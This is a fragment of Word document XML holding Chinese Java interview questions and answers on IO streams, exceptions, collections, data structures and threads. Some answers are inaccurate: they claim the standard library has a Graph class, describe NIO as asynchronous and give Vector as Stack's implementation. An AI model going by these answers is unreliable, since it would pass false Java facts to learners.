          <w:numId w:val="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字符流：Reader、Writer、FileReader、FileWriter、InputStreamReader、OutputStreamWriter、CharArrayReader、CharArrayWriter 等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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字符缓冲流：BufferedReader、BufferedWriter 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需要注意的是，字节流和字符流之间可以通过 InputStreamReader 和 OutputStreamWriter 进行转换。此外，Java 还提供了很多其他的 IO 类，如 RandomAccessFile、PrintStream、PushbackInputStream 等，使用时可以根据需求选择相应的实现类。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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字节流和字符流有什么区别？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字节流和字符流是 Java 中用于处理输入输出的两种流，主要的区别在于字节流以字节为单位读写数据，而字符流以字符为单位读写数据。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具体来说，字节流 InputStream 和 OutputStream 以字节为单位进行读写，例如 FileInputStream 和 FileOutputStream，可以用于操作二进制文件或者文本文件。而字符流 Reader 和 Writer 以字符为单位进行读写，例如 FileReader 和 FileWriter，可以用于操作文本文件。因为字符流可以直接读写字符，所以使用起来更加方便。</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此外，由于 Java 中字符采用的是 Unicode 编码，占用两个字节，因此在字符流的实现中，通常会使用缓冲区来减少实际读写操作的次数，以提高效率。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需要注意的是，字节流和字符流之间可以通过 InputStreamReader 和 OutputStreamWriter 进行转换，从而使得字节流也能够处理字符数据。但是在进行字符处理时，建议使用字符流，以避免出现编码问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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BIO、NIO、AIO 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BIO、NIO、AIO 是 Java 中用于进行网络编程的三种不同的技术。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BIO（Blocking IO）是传统的同步阻塞 IO 模型，即客户端发起请求后，服务器端接受连接并创建线程处理请求，直到完成整个 IO 操作之后才返回结果。BIO 的缺点是并发能力较差，因为每个请求都需要创建新的线程，容易导致资源浪费和性能下降。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NIO（Non-blocking IO）是在 JDK 1.4 中引入的新 IO 模型，采用了 Reactor 设计模式。NIO 的主要特点是使用了单独的线程处理 IO 操作，通过轮询方式实现 IO 的异步处理，从而避免了为每个请求创建新线程的问题。NIO 中的通道（Channel）和缓冲区（Buffer）分别对应传统 IO 模型中的流（Stream）和字节数组（byte array），但是可以实现双向数据传输。</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AIO（Asynchronous IO）是在 JDK 1.7 中引入的新 IO 模型，采用了 Proactor 设计模式。AIO 的主要特点是对 IO 操作的异步处理，当 IO 操作完成时，操作系统会通知应用程序，并将数据传递给应用程序处理，这样应用程序不需要阻塞等待 IO 操作的完成。AIO 中的 AsynchronousChannel 和 AsynchronousSocketChannel 对应 NIO 中的 Channel，但是可以实现异步操作。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综上所述，BIO 是传统的同步阻塞 IO 模型，NIO 是使用单独的线程处理 IO 操作的异步 IO 模型，AIO 是对 IO 操作的异步处理，当 IO 操作完成时，操作系统会通知应用程序，并将数据传递给应用程序处理。在性能和并发能力上，NIO 优于 BIO，AIO 在处理大量并发连接时优于 NIO。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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使用注解的原理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注解（Annotation）是一种元数据，它可以在Java源代码中以注解的方式存在，用来为代码提供补充的信息，例如方法的参数、返回值、异常、作者等等。在Java中，注解被定义为一种特殊的接口，它们以 @ 符号开头，放置在代码的某个位置上。</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注解的工作原理主要涉及以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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注解的定义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Java中的注解是一种接口，它定义了一组元素（成员变量），这些元素可以是基本数据类型、枚举类型、字符串、Class类型、注解类型等。注解使用 @interface 关键字定义，例如：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codepublic @interface MyAnnotation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String name() default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String desc() default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在上面的代码中，我们定义了一个名为 MyAnnotation 的注解，它有两个成员变量 name 和 desc。</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2.注解的使用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在Java中，我们可以在代码的某个位置上使用注解，例如类、方法、字段等。使用注解时，需要在注解的名称前加上 @ 符号，并传递注解的成员变量的值，例如：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javaCopy code@MyAnnotation(name="test", desc="This is a test annotation")</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class TestClass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 类的代码</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在上面的代码中，我们给类 TestClass 添加了一个 MyAnnotation 注解，并给它的 name 和 desc 成员变量赋值。</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3.注解处理器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注解本身并没有任何作用，需要使用注解处理器来读取注解并执行相应的操作。注解处理器是一段Java代码，它可以通过反射机制读取注解的信息，并进行相应的处理。例如，可以使用注解处理器在编译期间生成代码，或者在运行时使用注解处理器实现依赖注入等功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Java中的注解处理器主要使用反射机制来读取注解，它们可以使用 Java 提供的 API 来访问注解信息，并进行相应的操作。Java中提供了多种处理注解的方式，例如反射、APT（Annotation Processing Tool）等。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总之，注解是Java语言中的一种元数据，它通过定义、使用和注解处理器等机制来实现，可以为代码提供更加清晰、简洁、易于维护的方式，同时可以实现更加灵活和高效的编程方式。</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二、Java异常 9 道</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finally 块中的代码什么时候被执行？</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finally 是不是一定会被执行到？</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try-catch-finally 中，如果 catch 中 return 了，finally 还会执行吗？</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try-catch-finally 中那个部分可以省略？</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Error 和 Exception 的区别？</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运行时异常与受检异常有何异同？</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throw 和 throws 的区别？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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常见的异常类有哪些？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Java中的异常类主要分为两种：Checked Exception（受检异常）和Unchecked Exception（非受检异常）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Checked Exception</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Checked Exception 是指在程序运行时，可能会发生但程序必须处理的异常，它们必须在方法签名中声明，或者捕获并处理。一般情况下，这些异常表示程序可能会遇到无法处理的外部情况。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常见的 Checked Exception 包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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IOException：输入/输出异常，表示在读取或写入数据时发生错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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SQLException：SQL异常，表示在使用数据库时发生错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ClassNotFoundException：类未找到异常，表示在使用 Class.forName() 时找不到类。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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InterruptedException：线程中断异常，表示在等待、休眠或执行阻塞 I/O 操作时线程被中断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ParseException：解析异常，表示在解析字符串、日期等类型时发生错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Unchecked Exception</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Unchecked Exception 是指在程序运行时，可能会发生但程序不需要处理的异常，它们不需要在方法签名中声明，也可以不捕获并处理。一般情况下，这些异常表示程序出现了内部错误或逻辑错误。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常见的 Unchecked Exception 包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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NullPointerException：空指针异常，表示访问了空对象或空引用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ArrayIndexOutOfBoundsException：数组越界异常，表示访问了超出数组范围的索引。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ClassCastException：类型转换异常，表示进行了不合法的类型转换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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IllegalArgumentException：非法参数异常，表示方法参数不合法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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IllegalStateException：非法状态异常，表示对象状态不合法。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除了上述异常类，Java还提供了一些常用的异常类，比如RuntimeException、ArithmeticException、NumberFormatException等。了解和掌握常见的异常类对于编写高质量的Java程序非常重要。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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主线程可以捕获到子线程的异常吗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FF0C0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w: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主线程是可以捕获到子线程的异常的，但要注意以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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必须在主线程中显示调用子线程的 join() 方法，让主线程等待子线程结束后再继续执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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在子线程中抛出异常后，必须要有合适的方式将异常信息传递给主线程。常见的方式有通过共享变量、回调函数等方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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主线程可以通过 Thread 类的静态方法 setDefaultUncaughtExceptionHandler() 或者 Thread 实例的 setUncaughtExceptionHandler() 方法设置全局或者局部的未捕获异常处理器，来处理子线程中未捕获的异常。</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需要注意的是，子线程中的异常如果没有被捕获并及时处理，会导致程序崩溃。因此，在编写多线程程序时，一定要对子线程中的异常进行处理，以确保程序的稳定性和可靠性。</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三、Java集合 24 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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中常用的容器有哪些？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Java中提供了丰富的容器类，常用的容器有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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List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List 是一个有序的集合，可以允许有重复的元素。常用的实现类有 ArrayList、LinkedList 和 Vector。ArrayList 和 Vector 是基于数组实现的，LinkedList 是基于链表实现的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Set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Set 是一个不允许有重复元素的集合，常用的实现类有 HashSet、LinkedHashSet 和 TreeSet。HashSet 和 LinkedHashSet 是基于哈希表实现的，TreeSet 是基于红黑树实现的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Map</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Map 是一种键值对映射的数据结构，常用的实现类有 HashMap、LinkedHashMap 和 TreeMap。HashMap 和 LinkedHashMap 是基于哈希表实现的，TreeMap 是基于红黑树实现的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Queue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Queue 是一种先进先出（FIFO）的队列，常用的实现类有 LinkedList、PriorityQueue 和 ArrayDeque。其中 LinkedList 是基于链表实现的，PriorityQueue 是基于堆实现的，ArrayDeque 是基于数组实现的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Stack</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Stack 是一种后进先出（LIFO）的栈，常用的实现类是 Vector。</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以上是常用的容器类，它们都位于Java集合框架中，可以根据具体的需求选择不同的容器类。在使用容器时，需要考虑它们的性能、线程安全性、迭代器等方面的特点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ArrayList 和 LinkedList 的区别？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ArrayList 实现 RandomAccess 接口有何作用？为何 LinkedList 却没实现这个接口？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ArrayList 的扩容机制？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中，ArrayList 是基于数组实现的动态数组。当我们向 ArrayList 中添加元素时，如果发现当前容量不够用，就需要对其进行扩容。ArrayList 的扩容机制如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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当添加第一个元素时，ArrayList 容量为默认值10。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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每次添加元素时，ArrayList 都会检查当前容量是否够用，如果不够用就需要进行扩容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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扩容的大小为原容量的一半，也就是说每次扩容容量会增加原来容量的50%。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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扩容后需要将原数组中的元素复制到新数组中。</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需要注意的是，ArrayList 的扩容机制会带来一定的性能损失，因为在扩容时需要重新分配内存空间并复制数组元素，这些操作都需要消耗时间。所以，如果事先能够确定需要存储的元素数量，最好在创建 ArrayList 对象时指定其容量，以减少扩容次数和提高性能。</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Array 和 ArrayList 有何区别？什么时候更适合用 Array？</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的实现原理/底层数据结构？JDK1.7 和 JDK1.8</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的 put 方法的执行过程？</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的 get 方法的执行过程？</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的 resize 方法的执行过程？</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的 size 为什么必须是 2 的整数次方？</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多线程死循环问题？</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的 get 方法能否判断某个元素是否在 map 中？</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与 HashTable 的区别是什么？</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HashMap 与 ConcurrentHashMap 的区别是什么?</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HashTable 和 ConcurrentHashMap 的区别？</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ConcurrentHashMap 的实现原理是什么？</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HashSet 的实现原理？</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HashSet 怎么保证元素不重复的？</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LinkedHashMap 的实现原理?</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Iterator 怎么使用？有什么特点？</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Iterator 和 ListIterator 有什么区别？</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Iterator 和 Enumeration 接口的区别？</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fail-fast 与 fail-safe 有什么区别？</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Collection 和 Collections 有什么区别？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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java的常见的数据结构与算法有那些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Java是一种面向对象的编程语言，提供了丰富的数据结构和算法库。以下是Java中常见的数据结构和算法：</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集合框架：Java提供了一组常用的集合框架，包括ArrayList、LinkedList、HashSet、TreeSet、HashMap、TreeMap等，可以用于存储和管理数据。</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排序算法：Java中提供了Arrays.sort()和Collections.sort()方法，可以对数组和集合进行排序。</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查找算法：Java中提供了Arrays.binarySearch()和Collections.binarySearch()方法，可以在有序数组和集合中查找指定元素。</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字符串算法：Java中提供了String类和StringBuilder类，可以进行字符串操作。此外，Java还提供了正则表达式和相关的API，可以用于字符串匹配和替换。</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树和图算法：Java中提供了TreeSet、TreeMap和Graph类，可以用于树和图的操作。</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动态规划：Java中可以使用递归或动态规划算法来解决复杂问题。</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线程池：Java中提供了ThreadPoolExecutor类，可以用于管理线程池，提高多线程的效率和性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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序列化和反序列化：Java中提供了Serializable接口和ObjectInputStream、ObjectOutputStream类，可以将对象序列化和反序列化，实现对象的传输和持久化。</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只是Java中常见的数据结构和算法的一部分，实际上Java的标准库提供了更丰富的数据结构和算法，可以满足不同的编程需求。当然，在实际开发中，还可以使用第三方库和框架来扩展和优化Java的数据结构和算法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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常见的数据结构与算法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数据结构和算法是计算机科学的基础知识，是构建高效、可靠、可扩展软件系统的核心。以下是一些常见的数据结构和算法：</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数组：一组相同类型的数据，在内存中连续存储。常用于存储大量数据，并支持随机访问。</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链表：由节点构成的数据结构，每个节点包含一个数据元素和一个指向下一个节点的指针。常用于动态管理数据，并支持高效的插入和删除操作。</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栈：一种先进后出（Last In First Out，LIFO）的数据结构，只能在栈顶进行插入和删除操作。常用于程序调用栈、表达式求值等场景。</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队列：一种先进先出（First In First Out，FIFO）的数据结构，只能在队头和队尾进行插入和删除操作。常用于消息队列、任务队列等场景。</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树：由节点和边组成的数据结构，每个节点包含一个数据元素和若干个指向子节点的指针。常用于表达层次关系，如文件系统、XML文档、数据库索引等。</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图：由节点和边组成的数据结构，每个节点包含一个数据元素和若干个指向其他节点的指针。常用于表达任意复杂的关系，如社交网络、路由器网络等。</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排序算法：常见的排序算法包括冒泡排序、插入排序、选择排序、快速排序、归并排序等。这些算法用于将一个无序序列按照某个规则排序。</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查找算法：常见的查找算法包括线性查找、二分查找、哈希查找等。这些算法用于在一个有序或无序序列中查找指定的元素。</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字符串算法：常见的字符串算法包括朴素算法、KMP算法、Boyer-Moore算法等。这些算法用于在一个文本中查找指定的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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动态规划：一种解决复杂问题的算法思想，将问题分解成多个子问题，并找到它们之间的递推关系。常用于求解最优解、最长子序列、最短路径等问题。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以上只是一些常见的数据结构和算法，实际应用中还有很多其他的数据结构和算法。在选择数据结构和算法时，需要根据具体的问题场景和性能要求进行选择和优化。</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四、Java并发 42 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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并行和并发有什么区别？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并行（Parallel）和并发（Concurrency）是多线程编程中两个常用的概念。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并发是指多个任务在同一个时间段内执行，即在单位时间内有多个任务在交替执行。多个任务之间可能会交替执行，也可能会同时执行，但是任务之间的执行是互不干扰的，每个任务独立运行。并发是一种利用CPU时间片轮换的方式，通过分时复用CPU资源，提高系统的吞吐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并行是指多个任务在同一时刻执行，即在单位时间内有多个任务同时执行。多个任务之间是同时运行，可以通过多核处理器等硬件资源实现。并行通常需要更高的硬件支持，同时多个任务共享硬件资源，需要考虑如何协调资源的分配和使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因此，简单来说，并发是一种逻辑上的概念，可以在单个处理器上实现，而并行是一种物理上的概念，需要多个处理器或多个计算机等硬件资源支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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线程和进程的区别？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线程和进程都是操作系统中进行任务调度和资源管理的基本单位，它们之间的主要区别如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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调度和执行方式不同：进程是程序在执行过程中分配和管理资源的基本单位，是系统中最基本的调度单位，而线程是在进程内部运行的较小单位。在操作系统中，每个进程都有自己的内存空间和系统资源，而线程是在进程内共享进程的内存空间和系统资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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资源占用和切换代价不同：进程切换需要保存和恢复进程上下文信息、页表、文件描述符等系统资源，因此切换代价相对较高。线程切换只需要保存和恢复线程的上下文信息，因此切换代价相对较低。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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通信和同步机制不同：进程之间通信和同步需要使用IPC（进程间通信）机制，如管道、消息队列、信号量、共享内存等。线程之间共享进程的内存空间，可以使用共享变量、信号量等同步机制实现线程之间的通信和同步。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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安全性和稳定性不同：由于进程有独立的内存空间和系统资源，因此进程之间相互独立，一个进程崩溃不会影响其他进程的运行；而线程之间共享进程的内存空间和系统资源，一个线程崩溃会导致整个进程崩溃。</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综上所述，线程比进程轻量级，具有更高的资源利用率和更低的切换代价，适用于需要高效地进行并发处理和数据共享的场景；而进程具有更好的安全性和稳定性，适用于需要隔离和保护资源的场景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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进程的通信方式？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进程间通信（IPC，Inter-process communication）是指在不同进程间进行数据交换和共享的机制。在操作系统中，进程是独立的、互相隔离的实体，通过进程间通信可以使它们进行协作，共同完成任务。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进程间通信的方式有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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管道（Pipe）：管道是一种半双工的通信方式，只能用于具有亲缘关系的进程之间的通信。在管道中，数据只能向一个方向流动，需要实现双向通信则需要创建两个管道。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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信号（Signal）：信号是一种异步通信方式，进程之间通过向特定进程发送信号来通知该进程某个事件已经发生。信号可以用于进程间的同步和通信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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共享内存（Shared memory）：共享内存是指两个或多个进程共享同一个物理内存区域。这种通信方式是最快的一种，但同时也需要使用同步机制来避免多个进程同时读写共享内存时的竞争条件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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消息队列（Message queue）：消息队列是一种消息传递方式，它可以在不同进程间传递数据，并且能够通过指定消息类型来实现不同类型的数据传递。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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套接字（Socket）：套接字是一种网络通信方式，不仅可以用于不同机器之间的通信，还可以用于同一台机器上的不同进程之间的通信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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信号量（Semaphore）：信号量是一种同步机制，它用于控制多个进程对共享资源的访问。信号量可以实现进程之间的同步和互斥访问共享资源。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以上是常用的进程间通信方式，不同的通信方式有其各自的特点和适用场景。在实际应用中，需要根据实际情况选择合适的通信方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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线程的通信方式？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线程之间的通信方式包括共享内存和消息传递两种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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共享内存：多个线程共享同一块内存区域，通过读写共享变量来进行通信。例如使用锁机制（synchronized、ReentrantLock）来保证线程间同步访问共享数据，或者使用 volatile 关键字来保证可见性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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消息传递：线程之间通过发送消息来进行通信。例如使用阻塞队列（BlockingQueue）来实现生产者-消费者模型，或者使用 wait() 和 notify() 等方法来实现线程的等待和唤醒。</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无论是哪种方式，线程之间的通信都需要进行同步，以避免数据的不一致性和死锁等问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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守护线程是什么？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守护线程（Daemon Thread）是一种特殊类型的线程，它的作用是为其他线程提供服务，一般不会单独运行，而是随着程序的运行而启动，当所有的非守护线程结束后，守护线程也会自动退出。</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与非守护线程不同，守护线程不会阻止 JVM 的退出。例如，当所有的非守护线程都结束后，JVM 将自动关闭所有的守护线程，然后退出程序。因此，守护线程通常用于执行一些后台任务，如垃圾回收、日志记录等。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守护线程的创建方式与普通线程相同，只需调用 Thread 的 setDaemon(true) 方法将线程设置为守护线程即可。需要注意的是，setDaemon(true) 方法必须在调用 start() 方法之前调用，否则会抛出 IllegalThreadStateException 异常</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
